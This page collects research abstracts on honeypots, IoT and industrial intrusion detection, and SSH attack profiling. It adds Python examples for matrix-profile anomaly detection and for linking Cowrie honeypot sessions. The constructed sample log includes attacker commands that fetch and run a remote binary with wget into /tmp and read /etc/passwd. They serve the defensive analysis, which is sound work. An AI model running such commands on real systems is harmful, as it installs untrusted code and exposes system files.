
    Towards a Virtual Machine Introspection Based Multi-Service, Multi-Architecture, High-Interaction Honeypot for IOT Devices

    Internet of Things (IoT) devices are quickly growing in adoption. The use cases for IoT devices run the gamut from household applications (such as toasters, lighting and thermostats) to medical, battlefield or Industrial Control System (ICS) applications that are used in life-or-death situations. A disturbing trend for IoT devices is that they are not developed with security in mind. This lack of security has led to the creation of massive botnets that are used for nefarious acts. To address these issues, it is important to have a good understanding of the threat landscape that IoT devices face. A commonly used security control for monitoring and gaining insight into threats is a honeypot. This research explores the creation of a VMI-based high-interaction honeypot for IoT devices that is capable of monitoring multiple services simultaneously.

    Security in Process: Detecting Attacks in Industrial Process Data

    Due to the fourth industrial revolution, industrial applications make use of the progress in communication and embedded devices. This allows industrial users to increase efficiency and manageability while reducing cost and effort. Furthermore, the fourth industrial revolution, creating the so-called Industry 4.0, opens a variety of novel use and business cases in the industrial environment. However, this progress comes at the cost of an enlarged attack surface for industrial companies. Operational networks that were previously physically separated from public networks are now connected in order to make use of new communication capabilities. This motivates the need for industrial intrusion detection solutions that are compatible with the machines in long-term operation in industry as well as with heterogeneous and fast-changing networks. In this work, process data is analysed. The data is created and monitored on real-world hardware. After a set-up phase, attacks that influence the process behaviour are introduced into the system. A time-series anomaly detection approach, the Matrix Profile, is adapted to the specific needs and applied to intrusion detection. The results indicate that these methods are applicable to detecting attacks in the process behaviour. Furthermore, they are easily integrated into existing process environments. Additionally, the one-class classifiers One-Class Support Vector Machine and Isolation Forest are applied to the data without any notion of timing. While Matrix Profiles perform well in terms of creating and visualising results, the one-class classifiers perform poorly.
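    As an added illustration of the Matrix Profile approach the abstract describes (this is example code written for this page, not the authors' implementation), the following Python computes a brute-force matrix profile with z-normalised Euclidean distance over a constructed periodic process signal in which a sensor reading is frozen for twelve samples, a crude model of a replayed or spoofed measurement. The signal, the window length m=12 and the exclusion zone are assumptions of the example. The subsequence with the largest nearest-neighbour distance (the top discord) falls inside the frozen window, while a normal subsequence has an almost exact match one period away and therefore a profile value near zero.

```python
import math
from typing import List, Optional, Tuple


def make_process_signal(n: int = 200, period: int = 20,
                        freeze_at: int = 120, freeze_len: int = 12) -> List[float]:
    """Constructed stand-in for a periodic process measurement (e.g. a tank
    level cycling under a controller). From freeze_at onwards the sensor
    value is held at its last genuine reading for freeze_len samples,
    modelling a frozen/replayed measurement. No real process data is used."""
    sig = [math.sin(2 * math.pi * i / period) + 0.3 * math.sin(4 * math.pi * i / period)
           for i in range(n)]
    held = sig[freeze_at]
    for i in range(freeze_at, min(n, freeze_at + freeze_len)):
        sig[i] = held
    return sig


def znorm(seq: List[float]) -> List[float]:
    """Z-normalise a subsequence; a constant subsequence maps to all zeros."""
    n = len(seq)
    mu = sum(seq) / n
    sd = math.sqrt(sum((x - mu) ** 2 for x in seq) / n)
    if sd < 1e-12:
        return [0.0] * n
    return [(x - mu) / sd for x in seq]


def matrix_profile(series: List[float], m: int,
                   exclusion: Optional[int] = None) -> Tuple[List[float], List[int]]:
    """Brute-force matrix profile: for every window of length m, the distance
    to its nearest non-trivial neighbour and that neighbour's index.
    Windows closer than the exclusion zone are skipped to avoid self-matches.
    O(n^2 m); fine for demonstration, STOMP/SCRIMP are the scalable versions."""
    if exclusion is None:
        exclusion = m // 2
    subs = [znorm(series[i:i + m]) for i in range(len(series) - m + 1)]
    profile: List[float] = []
    index: List[int] = []
    for i, a in enumerate(subs):
        best, best_j = math.inf, -1
        for j, b in enumerate(subs):
            if abs(i - j) <= exclusion:
                continue
            d = math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))
            if d < best:
                best, best_j = d, j
        profile.append(best)
        index.append(best_j)
    return profile, index


def top_discord(profile: List[float]) -> int:
    """Index of the window with the largest nearest-neighbour distance,
    i.e. the most anomalous stretch of the process signal."""
    return max(range(len(profile)), key=profile.__getitem__)


if __name__ == "__main__":
    s = make_process_signal()
    mp, _ = matrix_profile(s, m=12)
    k = top_discord(mp)
    print(f"discord starts at sample {k} (profile value {mp[k]:.3f})")
```

    Because the fully frozen window z-normalises to zeros, its distance to every other window is exactly sqrt(m); in a detector you would alarm when a profile value exceeds a threshold learnt during the set-up phase, and the paired index tells you which earlier window the normal behaviour resembled.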

    A Flexible Laboratory Environment Supporting Honeypot Deployment for Teaching Real-World Cybersecurity Skills

    In the practical study of cybersecurity, students benefit greatly from having full control of physical equipment and services. However, this presents far too great a security risk to be permitted on university campus networks. This paper describes an approach, used successfully at Northumbria University, in which students have control of an off-campus network laboratory with a dedicated connection to the Internet. The laboratory is flexible enough to allow the teaching of general-purpose networking and operating systems courses, while also supporting the teaching of cybersecurity through the safe integration of honeypot devices. In addition, the paper gives an analysis of honeypot architectures and presents two in detail. One of these offers students the opportunity to study cybersecurity attacks and defences at very low cost. It has been developed as a stand-alone device that can also be integrated safely into the laboratory environment for the study of more complex scenarios. The main contributions of this paper are the design and implementation of: an off-campus, physical network laboratory; a small, low-cost, configurable platform for use as a "lightweight" honeypot; and a laboratory-based, multi-user honeypot for large-scale, concurrent cybersecurity experiments. The paper outlines how the laboratory environment has been successfully deployed within a university setting to support the teaching and learning of cybersecurity. It highlights the types of experiments and projects that have been supported and can be supported in the future.

    Distributed Analysis of SSH Brute Force and Dictionary Based Attacks

    When designing and implementing a new system, one of the most common misuse cases a system administrator or security architect anticipates is that the system will be attacked with brute-force and dictionary-based methods. These attack vectors are commonplace and, as such, common defenses have been designed to help mitigate a successful attack. However, the commonly employed defenses are anticipated and circumvented by even the most novice of attackers. In order to better understand the nature and evolution of brute-force and dictionary attacks, research needs to evaluate the progression of the attack vectors as well as new variables for identifying the risk to systems. The research that follows examines brute-force and dictionary-based attacks from a geographical standpoint. Specifically, the gathered data is analyzed to define attack anomalies based on date, time, location, operating system and attacking client, in order to ascertain whether such variables are viable attack-indication markers for defensive purposes.

    Computer Criminal Profiling applied to Digital Investigations

    This PhD thesis aims to contribute to the Cyber Security body of knowledge and its Computer Forensic field, which is still in its infancy compared with other forensic sciences. With the advancement of computer technology and the proliferation of cyber crime, offenders making use of computers range from state-sponsored cyber squads to organised crime rings, and from cyber paedophiles to crypto miners abusing third-party computer resources. Cyber crime is not only costing the global economy billions of dollars annually; it is also a life-threatening risk, as society is increasingly dependent on critical systems such as those in air traffic control, hospitals or connected cars. Achieving cyber attribution is a step towards identifying, deterring and prosecuting offenders in cyberspace, a domain among the top priorities of the UK National Security Strategy. However, the rapid evolution of cyber crime may be an unprecedented challenge in the history of forensic science. Attempts to keep up with this pace often result in computer forensic practices limited to technical outcomes, such as the user accounts or IP addresses used by the offenders. These limitations are intensified when the current cyber security skills shortage is contrasted with the vastness of the digital crime scenes presented by cloud providers and extensive storage capacities, or with the wide range of available anonymising mechanisms. Quite often, offenders remain unidentified, unpunished and unstoppable. As these anonymising mechanisms conceal offenders from a technological perspective, it was considered that they would not offer the same level of concealment from a behavioural standpoint. Therefore, in addition to the analysis of the state of the art in cyber crime and anonymising mechanisms, the literature on traditional crime and criminal psychology was reviewed, in an attempt to learn what traits of human behaviour could be revealed by the evidence at a crime scene and how to recognise them.
    It was identified that the subdiscipline of criminology called criminal profiling helps provide these answers. Observing its success rate and benefits as a support tool in traditional investigations, it was hypothesised that a similar outcome could be achieved while investigating cyber crimes, provided that a framework could enable digital investigators to apply criminal profiling concepts in digital investigations. Before developing the framework, the scope of this thesis was limited to a subset of cyber crimes, consisting exclusively of computer intrusion cases. Also, among the potential benefits of criminal profiling, the reduction of the suspect pool, case linkage and the optimisation of investigative effort were included in the scope. An SSH honeypot experiment based on Cowrie was designed and deployed in a public cloud infrastructure. In its first phase, a single honeypot instance was launched, protected by username and password and accepting connection attempts from any Internet address. Users who were able to guess a valid pair of credentials, after a random number of attempts providing strong passwords, were presented with a simple file system in which all their interactions with the system were recorded, and all downloaded attack tools were isolated and securely stored for later analysis. In the second phase of the experiment, the honeypot infrastructure was expanded to a honeynet with 18 (eighteen) nodes, running in a total of 6 (six) geographic regions and making it possible to analyse additional variables such as the location of the "victim" system, the perceived influence of directory/file structure and contents, and resistance levels to password attacks. After a period of approximately 18 (eighteen) months, more than 7 million connection attempts and 12 million authentication attempts had been received by the honeynet, of which more than 85,000 succeeded in logging into one of the honeynet servers.
    Offenders were able to interact with the simulated operating systems and their files, enabling this research to identify behavioural patterns that proved useful not only for grouping offenders but also for enriching individual offender profiles. Among these behavioural patterns, the most relevant attributes were the choice of which commands and which parameters to run, whether the attack relied on automated or manual means, the pairs of usernames and passwords supplied in attempts to break the honeypot authentication, the response once a command was unsuccessful, the intent to use specific attack tools and the motivation behind it, any level of caution shown and, finally, preferences in naming tools, temporary files or customised ports. Based on the collected data set, such attributes make it possible to narrow down the pool of suspects, to link different honeypot break-ins to the same offender and to optimise investigative effort by enabling the researcher to focus the analysis on a reduced area while searching for evidence. In times when the cyber security skills shortage is a concerning challenge and profiling can play a critical role, it is believed that such a structured framework for criminal profiling within cyber investigations can help make the investigation of cyber crimes quicker, cheaper and more effective.
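    To make concrete the behavioural attributes the thesis extracts from Cowrie sessions, and the date/time and attacking-client analysis of the SSH brute-force study above, here is example code written for this page (not the thesis's or Cowrie's own code). It reads a few constructed lines in the shape of Cowrie's JSON log (the event ids cowrie.client.version, cowrie.login.failed, cowrie.login.success and cowrie.command.input are Cowrie's; the addresses, session ids, credentials and commands are made up), builds a per-session profile, fingerprints the client banner plus the normalised command sequence so that the same tooling run from different source addresses is linked, flags sessions whose commands arrive back to back as automated (the two-second threshold is an assumption), and buckets authentication attempts by hour.

```python
import hashlib
import json
from collections import Counter, defaultdict
from datetime import datetime
from typing import Dict, List

# Constructed sample in the shape of Cowrie's cowrie.json output. Addresses are
# from the documentation ranges; sessions a1 and b2 run the same script from
# different hosts, c3 is a slower hands-on-keyboard session.
SAMPLE_LOG = """
{"eventid":"cowrie.session.connect","timestamp":"2021-03-04T02:10:11.000000Z","src_ip":"203.0.113.10","session":"a1"}
{"eventid":"cowrie.client.version","timestamp":"2021-03-04T02:10:11.200000Z","src_ip":"203.0.113.10","session":"a1","version":"SSH-2.0-libssh2_1.8.0"}
{"eventid":"cowrie.login.failed","timestamp":"2021-03-04T02:10:12.000000Z","src_ip":"203.0.113.10","session":"a1","username":"root","password":"123456"}
{"eventid":"cowrie.login.success","timestamp":"2021-03-04T02:10:13.000000Z","src_ip":"203.0.113.10","session":"a1","username":"root","password":"admin"}
{"eventid":"cowrie.command.input","timestamp":"2021-03-04T02:10:14.000000Z","src_ip":"203.0.113.10","session":"a1","input":"uname -a"}
{"eventid":"cowrie.command.input","timestamp":"2021-03-04T02:10:15.000000Z","src_ip":"203.0.113.10","session":"a1","input":"cd /tmp; wget http://198.51.100.7/x86 -O .s; chmod +x .s; ./.s"}
{"eventid":"cowrie.session.connect","timestamp":"2021-03-04T09:42:01.000000Z","src_ip":"198.51.100.23","session":"b2"}
{"eventid":"cowrie.client.version","timestamp":"2021-03-04T09:42:01.300000Z","src_ip":"198.51.100.23","session":"b2","version":"SSH-2.0-libssh2_1.8.0"}
{"eventid":"cowrie.login.success","timestamp":"2021-03-04T09:42:02.000000Z","src_ip":"198.51.100.23","session":"b2","username":"root","password":"admin"}
{"eventid":"cowrie.command.input","timestamp":"2021-03-04T09:42:03.000000Z","src_ip":"198.51.100.23","session":"b2","input":"uname  -a"}
{"eventid":"cowrie.command.input","timestamp":"2021-03-04T09:42:04.000000Z","src_ip":"198.51.100.23","session":"b2","input":"cd /tmp; wget http://198.51.100.7/x86 -O .s; chmod +x .s; ./.s"}
{"eventid":"cowrie.session.connect","timestamp":"2021-03-04T09:50:30.000000Z","src_ip":"192.0.2.77","session":"c3"}
{"eventid":"cowrie.client.version","timestamp":"2021-03-04T09:50:30.100000Z","src_ip":"192.0.2.77","session":"c3","version":"SSH-2.0-OpenSSH_8.2"}
{"eventid":"cowrie.login.failed","timestamp":"2021-03-04T09:50:31.000000Z","src_ip":"192.0.2.77","session":"c3","username":"admin","password":"admin"}
{"eventid":"cowrie.login.success","timestamp":"2021-03-04T09:50:40.000000Z","src_ip":"192.0.2.77","session":"c3","username":"root","password":"toor"}
{"eventid":"cowrie.command.input","timestamp":"2021-03-04T09:50:41.000000Z","src_ip":"192.0.2.77","session":"c3","input":"ls -la"}
{"eventid":"cowrie.command.input","timestamp":"2021-03-04T09:50:55.000000Z","src_ip":"192.0.2.77","session":"c3","input":"cat /etc/passwd"}
{"eventid":"cowrie.command.input","timestamp":"2021-03-04T09:51:30.000000Z","src_ip":"192.0.2.77","session":"c3","input":"ls -la"}
"""

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")


def parse_events(text: str) -> List[dict]:
    """One JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _ts(ev: dict) -> datetime:
    # Cowrie writes ISO 8601 timestamps with microseconds and a trailing Z
    return datetime.strptime(ev["timestamp"], "%Y-%m-%dT%H:%M:%S.%fZ")


def build_profiles(events: List[dict]) -> Dict[str, dict]:
    """Group events by session and collect the attributes the thesis lists:
    client banner, credential pairs tried, ordered commands and their timing."""
    profiles: Dict[str, dict] = defaultdict(lambda: {
        "src_ip": None, "client": None, "creds": [], "commands": [], "cmd_times": []})
    for ev in sorted(events, key=_ts):
        p = profiles[ev["session"]]
        p["src_ip"] = ev["src_ip"]
        if ev["eventid"] == "cowrie.client.version":
            p["client"] = ev["version"]
        elif ev["eventid"] in LOGIN_EVENTS:
            p["creds"].append((ev["username"], ev["password"]))
        elif ev["eventid"] == "cowrie.command.input":
            p["commands"].append(ev["input"])
            p["cmd_times"].append(_ts(ev))
    return dict(profiles)


def fingerprint(profile: dict) -> str:
    """Hash of client banner plus whitespace-normalised command sequence, so
    the same toolkit run from different source addresses collides."""
    cmds = [" ".join(c.split()) for c in profile["commands"]]
    material = (profile["client"] or "") + "\n" + "\n".join(cmds)
    return hashlib.sha256(material.encode()).hexdigest()[:16]


def is_likely_automated(profile: dict, max_gap_s: float = 2.0) -> bool:
    """Scripts issue commands back to back; a human pauses. The threshold is
    an assumption for this example, not a value from the thesis."""
    t = profile["cmd_times"]
    if len(t) < 2:
        return False
    return max((b - a).total_seconds() for a, b in zip(t, t[1:])) <= max_gap_s


def link_sessions(profiles: Dict[str, dict]) -> Dict[str, List[str]]:
    """Case linkage: fingerprints shared by more than one session."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for sid, p in profiles.items():
        groups[fingerprint(p)].append(sid)
    return {fp: sorted(s) for fp, s in groups.items() if len(s) > 1}


def login_attempts_by_hour(events: List[dict]) -> Counter:
    """Authentication attempts bucketed by hour, for date/time analysis."""
    return Counter(_ts(ev).strftime("%Y-%m-%dT%H")
                   for ev in events if ev["eventid"] in LOGIN_EVENTS)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    profs = build_profiles(evs)
    for sid, p in profs.items():
        kind = "automated" if is_likely_automated(p) else "interactive"
        print(sid, p["src_ip"], p["client"], fingerprint(p), kind, p["creds"])
    print("linked:", link_sessions(profs))
    print("attempts per hour:", dict(login_attempts_by_hour(evs)))
```

    On the sample, a1 and b2 share a fingerprint despite different source addresses and a spacing difference in `uname -a`, which is the linkage signal the thesis relies on when IP addresses alone are inconclusive; c3 stays separate and is classed as interactive because of its multi-second pauses.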